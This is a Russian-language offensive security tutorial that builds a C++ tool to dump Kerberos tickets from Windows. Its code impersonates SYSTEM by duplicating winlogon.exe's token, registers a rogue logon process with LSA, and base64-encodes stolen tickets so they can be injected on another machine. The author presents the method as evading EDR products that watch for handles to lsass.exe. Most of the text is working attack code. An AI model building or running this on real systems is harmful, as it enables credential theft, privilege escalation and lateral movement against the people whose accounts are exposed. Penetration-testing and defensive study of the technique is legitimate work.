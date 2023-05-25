Kerberos пре­дос­тавля­ет мно­жес­тво фун­кций для аутен­тифика­ции поль­зовате­лей. Основным «кир­пичиком» счи­тают­ся тикеты, которые в ходе тес­тирова­ния на про­ник­новение ата­кующий хотя бы раз дам­пит из памяти про­цес­са LSASS. Давай раз­берем­ся, как мож­но решить эту задачу, не при­бегая к слож­ным инс­тру­мен­там.

Ти­кеты Kerberos быва­ют двух видов: TGT (Ticket Granting Ticket) и TGS (Ticket Granting Service). Для их дам­па исполь­зуют­ся популяр­ные инс­тру­мен­ты, которые дав­но извес­тны и сис­темным адми­нис­тра­торам, и тем более коман­де защит­ников. Каж­дый раз обфусци­ровать или крип­товать тот же Mimikatz как минимум тру­дозат­ратно, поэто­му я решил разоб­рать­ся в том, как работа­ет дамп тикетов с сис­тем Windows.

Kerberos AP

В од­ной из моих прош­лых ста­тей ты узнал, что такое SSP, SP и AP. Теперь пора начинать ими зло­упот­реблять по‑нас­тояще­му! Мы будем обра­щать­ся к AP Kerberos и дос­тавать из него билеты. Этот AP по умол­чанию всег­да при­сутс­тву­ет в про­цес­се lsass. exe , поэто­му для вза­имо­дей­ствия с ним будут исполь­зовать­ся стан­дар­тные API, которые нуж­ны для работы с LSA.

Нам пот­ребу­ется все­го нес­коль­ко фун­кций:

Да, дамп будет выпол­нен без вся­кой магии, стан­дар­тны­ми, легитим­ными вызова­ми API. Я пом­ню, как однажды услы­шал, буд­то дамп тикетов осу­щест­вля­ется путем чте­ния, а затем пар­синг памяти LSASS. Так вот, друзья мои, ни Rubeus, ни Mimikatz так не дела­ют. Оба инс­тру­мен­та дам­пят точ­но так же, с помощью тех же самых апи­шек.

Ито­говый резуль­тат получил­ся более чем кры­шес­носный. Если у нас есть пра­ва локаль­ного адми­нис­тра­тора, то мы выг­рузим абсо­лют­но ВСЕ тикеты из сис­темы.

А если прав адми­нис­тра­тора нет, то смо­жем получить лишь тикеты из сеан­са вхо­да текуще­го поль­зовате­ля.

Итак, прис­тупим к написа­нию инс­тру­мен­та.

Начало работы

При вза­имо­дей­ствии по про­токо­лу Kerberos меж­ду кли­ентом и KDC или служ­бой исполь­зует­ся AP Kerberos. Внут­ри его кеша будут хра­нить­ся все сес­сион­ные клю­чи, а так­же получен­ные поль­зовате­лем TGT- и TGS-билеты. Но каким обра­зом AP Kerberos понима­ет, что этот тикет при­над­лежит такому‑то поль­зовате­лю, а этот дру­гому? Здесь в игру всту­пают LUID. LUID — некий иден­тифика­тор текущей сес­сии. Мы можем уви­деть текущий LUID с помощью коман­ды klist .

Для успешно­го дам­па тикетов дру­гих поль­зовате­лей нам нуж­но знать их LUID. Перечис­лить LUID мож­но с помощью LsaGetLogonSessionData( ) . Под­робнее эту фун­кцию мы рас­смот­рим чуточ­ку поз­же, но отме­чу, что если мы не име­ем прав адми­нис­тра­тора, то ник­то не даст нам сдам­пить чужие тикеты, поэто­му подоб­ная раз­ведка может ока­зать­ся бес­смыс­ленной.

Во‑пер­вых, я пред­лагаю соз­дать заголо­воч­ный файл stuff. h , куда мы помес­тим все про­тоти­пы фун­кций, дру­гие заголо­воч­ные фай­лы и некото­рые перечис­ляемые зна­чения с заделом на будущее.

#pragma once #define WIN32_NO_STATUS #define SECURITY_WIN32 #include < Windows. h> #include < NTSecAPI. h> #include < iostream> #include < sddl. h> #include < algorithm> #include < string> #include < TlHelp32. h> #include < cstring> #include < cstdlib> #include < iomanip> #include < map> #define DEBUG #include < locale> #define NT_SUCCESS( Status) ((( NTSTATUS)( Status)) > = 0) #pragma comment ( lib, "Secur32. lib") const PCWCHAR TicketFlagsToStrings [ ] = { L"name_canonicalize" , L"?" , L"ok_as_delegate" , L"?" , L"hw_authent" , L"pre_authent" , L"initial" , L"renewable" , L"invalid" , L"postdated" , L"may_postdate" , L"proxy" , L"proxiable" , L"forwarded" , L"forwardable" , L"reserved" , } ; const char base64_chars [ ] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ " ; LSA_STRING * create_lsa_string ( const char * value ) ; bool EnablePrivilege ( PCWSTR privName , bool enable ) ; DWORD ImpersonateSystem () ; BOOL LsaConnect ( PHANDLE LsaHandle ) ; VOID filetimeToTime ( const FILETIME * time ) ; VOID ParseTktFlags ( ULONG flags ) ; DWORD ReceiveLogonInfo ( HANDLE LsaHandle , LUID LogonId , ULONG kerberosAP ) ; ULONG GetKerberosPackage ( HANDLE LsaHandle , LSA_STRING lsastr ) ;

По­ка мы не будем углублять­ся в под­робнос­ти работы каж­дой фун­кции — я рас­ска­жу о них чуть поз­же. Мы так­же добави­ли мас­сив сим­волов для кодиро­вания в Base64. Кодиро­вать тикет в Base64 нуж­но по той при­чине, что он пред­став­ляет собой бинар­ные дан­ные, которые невоз­можно кор­рек­тно отоб­разить.

Как ты видишь, здесь огромное количес­тво непеча­таемых сим­волов. Раз­ве что прос­матри­вает­ся имя домена. Эти дан­ные никак не получит­ся ско­пиро­вать, вста­вить на дру­гой компь­ютер, а затем внед­рить, поэто­му при­меня­ем кодиро­вание в Base64. Фун­кция для кодиро­вания выг­лядит вот так:

std : : string base64_encode ( const unsigned char * bytes_to_encode , size_t in_len ) { std : : string out ; int val = 0 , valb = - 6 ; for ( size_t i = 0 ; i < in_len ; ++ i ) { unsigned char c = bytes_to_encode [ i ] ; val = ( val < < 8 ) + c ; valb += 8 ; while ( valb > = 0 ) { out . push_back ( base64_chars [ ( val > > valb ) & 0x3F ]) ; valb -= 6 ; } } if ( valb > - 6 ) out . push_back ( base64_chars [( ( val < < 8 ) > > ( valb + 8 ) ) & 0x3F ]) ; while ( out . size ( ) % 4 ) out . push_back ( '=' ) ; return out ; }

Она как раз исполь­зует этот самый мас­сив сим­волов. Теперь перей­дем в самое начало нашего кода, в фун­кцию main :

int main ( ) { setlocale ( LC_ALL , "" ) ; ShowAwesomeBanner () ; HANDLE LsaHandle = NULL ; BOOL DumpAllTickets = FALSE ; if ( LsaConnect ( & LsaHandle ) ) { #ifdef DEBUG std : : wcout < < L"[ +] I'll dump all tickets" < < std : : endl ; #endif DumpAllTickets = TRUE ; } else { #ifdef DEBUG std : : wcout < < L"[ -] I'll dump tickets of current user" < < std : : endl ; #endif } #ifdef DEBUG std : : wcout < < L"[ +] LsaHandle: " < < ( unsigned long ) LsaHandle < < std : : endl ; #endif PLSA_STRING krbname = create_lsa_string ( "kerberos" ) ; ULONG kerberosAP = GetKerberosPackage ( LsaHandle , * krbname ) ; #ifdef DEBUG std : : wcout < < L"[ +] Kerberos AP: " < < kerberosAP < < std : : endl ; #endif

Уж изви­ни меня за такое количес­тво дирек­тив для преп­роцес­сора. Сна­чала думал их убрать, а потом оста­вил. Если тебе не нуж­но лиш­него боль­шого вывода, где инс­тру­мент будет сооб­щать обо всем, что он дела­ет с сис­темой, то прос­то из фай­ла stuff. h убе­ри стро­ку #define DEBUG . Если же пот­ребу­ется отсле­дить весь поток вызовов, оставляй ее.

Итак, пер­вым делом мы ста­вим локаль, что­бы наш инс­тру­мент умел успешно работать с любыми язы­ками, хоть с рус­ским, хоть с япон­ским, хоть с кап­падокий­ским диалек­том гре­чес­кого язы­ка. Далее в фун­кции ShowAwesomeBanner( ) мы выводим наш суперс­траш­ный череп (ведь никакая хакер­ская тул­за не обой­дет­ся без него), а затем нас­тупа­ет этап под­клю­чения к LSA в фун­кции LsaConnect( ) .

Особенности дампа

Наш инс­тру­мент замеча­телен тем, что тикеты будет отда­вать сам AP Kerberos. При­чем этот вари­ант мож­но счи­тать дос­таточ­но скрыт­ным. Быть может, на каких‑то пен­тестах ты замечал, что сдам­пить LSASS стан­дар­тны­ми средс­тва­ми не получа­ется, но при этом какой‑нибудь Rubeus. exe dump успешно отра­баты­вает. Зна­ешь почему?

Проб­лема зак­люча­ется в том, что боль­шинс­тво EDR (да и вся­ких дру­гих новомод­ных средств защиты, в рек­ламу которых вбу­хива­ют мил­лионы дол­ларов) отсле­жива­ет при­митив­ные фун­кции для получе­ния хен­дла на про­цесс lsass. exe . Нап­ример, хука­ют тот же OpenProcess( ) . Вся­кие более прод­винутые вари­анты исполь­зуют чуть боль­шее чис­ло вари­антов, но это­го мало. Мы будем вза­имо­дей­ство­вать не с про­цес­сом lsass. exe , а со служ­бой LSA. Нам не понадо­бит­ся получать хендл на про­цесс, мы получим хендл толь­ко на саму служ­бу, поэто­му задетек­тировать наш инс­тру­мент будет чуточ­ку слож­нее.

Подключение к LSA

Что­бы начать вза­имо­дей­ство­вать с AP Kerberos, сле­дует под­клю­чить­ся к LSA, ведь имен­но LSA управля­ет все­ми пакета­ми аутен­тифика­ции. Под­клю­чение я вынес в отдель­ную фун­кцию LsaConnect( ) . Она при­нима­ет адрес, который ини­циали­зиру­ется валид­ным хен­длом на LSA, если смо­жет его получить.

// Вызов функции HANDLE LsaHandle = NULL ; LsaConnect ( & LsaHandle ) ; // Функция BOOL LsaConnect ( PHANDLE LsaHandle ) { NTSTATUS status = 0 ; wchar_t username [ 256 ] ; DWORD usernamesize ; #ifdef DEBUG GetUserName ( username , & usernamesize ) ; std : : wcout < < L"[ ?] Current user: " < < username < < std : : endl ; std : : wcout < < L"[ ?] Trying to get system" < < std : : endl ; #endif if ( ImpersonateSystem ( ) != 0 ) { #ifdef DEBUG std : : wcout < < L"[ -] Cant get SYSTEM rights" < < std : : endl ; #endif status = LsaConnectUntrusted ( LsaHandle ) ; if ( ! NT_SUCCESS ( status ) || ! LsaHandle ) { std : : wcout < < L"[ -] LsaConnectUntrusted Err: " < < LsaNtStatusToWinError ( status ) < < std : : endl ; exit ( - 1 ) ; } return FALSE ; } else { GetUserName ( username , & usernamesize ) ; PLSA_STRING krbname = create_lsa_string ( "MzHmO Dumper" ) ; LSA_OPERATIONAL_MODE info ; #ifdef DEBUG std : : wcout < < L"[ ?] Current user: " < < username < < std : : endl ; #endif status = LsaRegisterLogonProcess ( krbname , LsaHandle , & info ) ; if ( ! NT_SUCCESS ( status ) || ! LsaHandle ) { std : : wcout < < L"[ -] Cant Register Logon Process" < < std : : endl ; status = LsaConnectUntrusted ( LsaHandle ) ; if ( ! NT_SUCCESS ( status ) || ! LsaHandle ) { std : : wcout < < L"[ -] LsaConnectUntrusted Err: " < < LsaNtStatusToWinError ( status ) < < std : : endl ; exit ( - 1 ) ; } return FALSE ; } return TRUE ; } }

Итак, имен­но в этой фун­кции мы будем про­верять, получит­ся ли сдам­пить тикеты всех поль­зовате­лей, либо мы огра­ничим­ся толь­ко текущим. Сна­чала получа­ем имя поль­зовате­ля, от лица которо­го запущен инс­тру­мент, пос­ле чего дер­гает­ся фун­кция ImpersonateSystem( ) . Она дос­таточ­но прос­та — спер­ва пыта­ется добавить поль­зовате­лю при­виле­гию SeDebug и SeImpersonate , затем получа­ет хендл на про­цесс winlogon. exe (мож­но заменить любым дру­гим, запущен­ным от лица сис­темы). Наконец, исполь­зуя этот хендл, фун­кция получа­ет токен про­цес­са winlogon. exe и при­меня­ет его к текуще­му потоку, что поз­волит добить­ся выпол­нения кода от лица сис­темы.

DWORD ImpersonateSystem ( ) { if ( ! EnablePrivilege ( SE_DEBUG_NAME , TRUE ) ) { #ifdef DEBUG std : : wcout < < "[ !] Error enabling SeDebugPrivilege" < < std : : endl ; #endif return 1 ; } else { #ifdef DEBUG std : : wcout < < "[ +] SeDebugPrivilege Enabled" < < std : : endl ; #endif } if ( ! EnablePrivilege ( SE_IMPERSONATE_NAME , TRUE ) ) { #ifdef DEBUG std : : wcout < < "[ !] Error enabling SeImpersonatePrivilege" < < std : : endl ; #endif return 1 ; } else { #ifdef DEBUG std : : wcout < < "[ +] SeImpersonatePrivilege Enabled" < < std : : endl ; #endif } DWORD systemPID = GetWinlogonPid () ; if ( systemPID == 0 ) { #ifdef DEBUG std : : wcout < < "[ !] Error getting PID to Winlogon process" < < std : : endl ; #endif return 1 ; } HANDLE procHandle = OpenProcess ( PROCESS_QUERY_INFORMATION , FALSE , systemPID ) ; DWORD dw = 0 ; dw = : : GetLastError () ; if ( dw != 0 ) { #ifdef DEBUG std : : wcout < < L"[ -] OpenProcess failed: " < < dw < < std : : endl ; #endif return 1 ; } HANDLE hSystemTokenHandle ; OpenProcessToken ( procHandle , TOKEN_DUPLICATE , & hSystemTokenHandle ) ; dw = : : GetLastError () ; if ( dw != 0 ) { #ifdef DEBUG std : : wcout < < L"[ -] OpenProcessToken failed: " < < dw < < std : : endl ; #endif return 1 ; } HANDLE newTokenHandle ; DuplicateTokenEx ( hSystemTokenHandle , TOKEN_ALL_ACCESS , NULL , SecurityImpersonation , TokenPrimary , & newTokenHandle ) ; dw = : : GetLastError () ; if ( dw != 0 ) { #ifdef DEBUG std : : wcout < < L"[ -] DuplicateTokenEx failed: " < < dw < < std : : endl ; #endif return 1 ; } ImpersonateLoggedOnUser ( newTokenHandle ) ; return 0 ; }

Фун­кции для работы с токена­ми мы уже рас­смат­ривали в стать­ях «Privileger. Управля­ем при­виле­гиями в Windows» и «Свин API. Изу­чаем воз­можнос­ти WinAPI для пен­тесте­ра», поэто­му не вижу смыс­ла на них оста­нав­ливать­ся. GetWinlogonPid( ) , исполь­зуя CreateToolhelp32Snapshot( ) , получа­ет спи­сок текущих про­цес­сов, а затем про­бега­ется по ним, что­бы обна­ружить про­цесс с нуж­ным име­нем, то есть winlogon. exe .

DWORD GetWinlogonPid ( ) { PROCESSENTRY32 entry ; entry . dwSize = sizeof ( PROCESSENTRY32 ) ; HANDLE snapshot = CreateToolhelp32Snapshot ( TH32CS_SNAPPROCESS , NULL ) ; if ( Process32First ( snapshot , & entry ) == TRUE ) { while ( Process32Next ( snapshot , & entry ) == TRUE ) { if ( _wcsicmp ( entry . szExeFile , L"winlogon. exe" ) == 0 ) { return entry . th32ProcessID ; } } } return 0 ; }

Ес­ли хотя бы одна из этих опе­раций обо­рачи­вает­ся неуда­чей, то нам будет суж­дено сдам­пить лишь тикеты текуще­го поль­зовате­ля. ImpersonateSystem( ) вер­нет 0, если успешно получи­ла выпол­нение кода от лица сис­темы, и -1 , если что‑то пош­ло не так. Поэто­му добав­ляем прос­тое усло­вие if .

if ( ImpersonateSystem ( ) != 0 ) { #ifdef DEBUG std : : wcout < < L"[ -] Cant get SYSTEM rights" < < std : : endl ; #endif status = LsaConnectUntrusted ( LsaHandle ) ; if ( ! NT_SUCCESS ( status ) || ! LsaHandle ) { std : : wcout < < L"[ -] LsaConnectUntrusted Err: " < < LsaNtStatusToWinError ( status ) < < std : : endl ; exit ( - 1 ) ; } return FALSE ; }

Нач­нем с вари­анта, в котором нам не уда­лось добить­ся исполне­ния кода от лица сис­темы. В таком слу­чае при­дет­ся нем­ножко взгрус­тнуть, получить обыч­ный хендл на LSA и вер­нуть FALSE . Получе­ние хен­дла на LSA через LsaConnectUntrusted( ) при­ведет к тому, что все «ядер­ные» воз­можнос­ти дам­па чужих тикетов ока­жут­ся нам недос­тупны. Мы будем счи­тать­ся, бук­валь­но говоря, недове­рен­ным про­цес­сом. В даль­нейшем этот воз­вра­щен­ный FALSE про­веря­ется и уста­нав­лива­ется соот­ветс­тву­ющий фла­жок, который сиг­нализи­рует, воз­можен дамп тикетов из всех сес­сий или нет.

if ( LsaConnect ( & LsaHandle ) ) { std : : wcout < < L"[ +] I'll dump all tickets" < < std : : endl ; DumpAllTickets = TRUE ; } else { std : : wcout < < L"[ -] I'll dump tickets of current user" < < std : : endl ; }

Ес­ли же нам повез­ло чуть боль­ше, то теперь наша прог­рамма исполня­ется от лица сис­темы, поэто­му регис­три­руем про­цесс вхо­да в сис­тему. Сде­лать это мож­но с помощью LsaRegisterLogonProcess( ) . Ука­зан­ная фун­кция при­нима­ет имя нового про­цес­са вхо­да, некото­рую (не осо­бо важ­ную) допол­нитель­ную информа­цию, а воз­вра­щает «ядер­ный» хендл на LSA.

else { GetUserName ( username , & usernamesize ) ; PLSA_STRING krbname = create_lsa_string ( "MzHmO Dumper" ) ; LSA_OPERATIONAL_MODE info ; #ifdef DEBUG std : : wcout < < L"[ ?] Current user: " < < username < < std : : endl ; #endif status = LsaRegisterLogonProcess ( krbname , LsaHandle , & info ) ; if ( ! NT_SUCCESS ( status ) || ! LsaHandle ) { std : : wcout < < L"[ -] Cant Register Logon Process" < < std : : endl ; status = LsaConnectUntrusted ( LsaHandle ) ; if ( ! NT_SUCCESS ( status ) || ! LsaHandle ) { std : : wcout < < L"[ -] LsaConnectUntrusted Err: " < < LsaNtStatusToWinError ( status ) < < std : : endl ; exit ( - 1 ) ; } return FALSE ; } return TRUE ; }

По­лучен­ный с помощью фун­кции LsaRegisterLogonProcess( ) хендл не име­ет никаких огра­ниче­ний в пла­не вза­имо­дей­ствия с LSA. Его мож­но исполь­зовать для любых целей, мы фак­тичес­ки ста­новим­ся про­цес­сом вхо­да, поч­ти как winlogon. exe . Про­цесс вхо­да дол­жен иметь свое уни­каль­ное имя, что­бы LSA мог­ла понимать, к кому обра­щать­ся. LSA вос­при­нима­ет стро­ки толь­ко в виде спе­циаль­ной струк­туры LSA_STRING . Для кор­рек­тной ини­циали­зации всех эле­мен­тов этой струк­туры я так­же сде­лал спе­циаль­ную фун­кцию:

LSA_STRING * create_lsa_string ( const char * value ) { char * buf = new char [ 100 ] ; LSA_STRING * str = ( LSA_STRING * ) buf ; str -> Length = strlen ( value ) ; str -> MaximumLength = str -> Length ; str -> Buffer = buf + sizeof ( LSA_STRING ) ; memcpy ( str -> Buffer , value , str -> Length ) ; return str ; }